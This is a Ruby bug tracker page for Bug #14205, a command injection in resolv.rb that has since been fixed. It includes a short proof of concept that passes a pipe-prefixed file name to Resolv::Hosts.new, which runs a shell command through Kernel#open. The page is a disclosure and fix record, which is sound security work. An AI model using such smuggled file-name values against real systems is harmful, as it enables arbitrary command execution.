Project

General

Profile

Actions
Copy link

Bug #14205

closed

Unsanitizied filename leads to command injection in 'resolv.rb'

Added by drigg3r (Jasraj Bedi) almost 7 years ago. Updated almost 7 years ago.

Status:
Closed
Assignee:
-
Target version:
-
ruby -v:
Backport:
2.3: UNKNOWN, 2.4: UNKNOWN
[ruby-core:84347]

Description

Here is the pull request
https://github.com/ruby/ruby/pull/1777

Actions
Copy link
 #1 [ruby-core:84348]

Updated by drigg3r (Jasraj Bedi) almost 7 years ago

  • Subject changed from Unsanitizied filename leads to command injection in 'resolv' to Unsanitizied filename leads to command injection in 'resolv.rb'

PoC Concept Code

require 'resolv'
a = Resolv::Hosts::new("|echo 1 > /tmp/rce")
a.getaddress("test")
Actions
Copy link
 #2

Updated by nobu (Nobuyoshi Nakada) almost 7 years ago

  • Status changed from Open to Closed

Applied in changeset trunk|r61349.

Fixed command Injection

  • resolv.rb (Resolv::Hosts#lazy_initialize): fixed potential
    command Injection in Hosts::new() by use of Kernel#open.
    [Fix GH-1777] [ruby-core:84347] [Bug #14205]

From: Drigg3r

Actions
Copy link

Also available in: Atom PDF

Like0
Like0Like0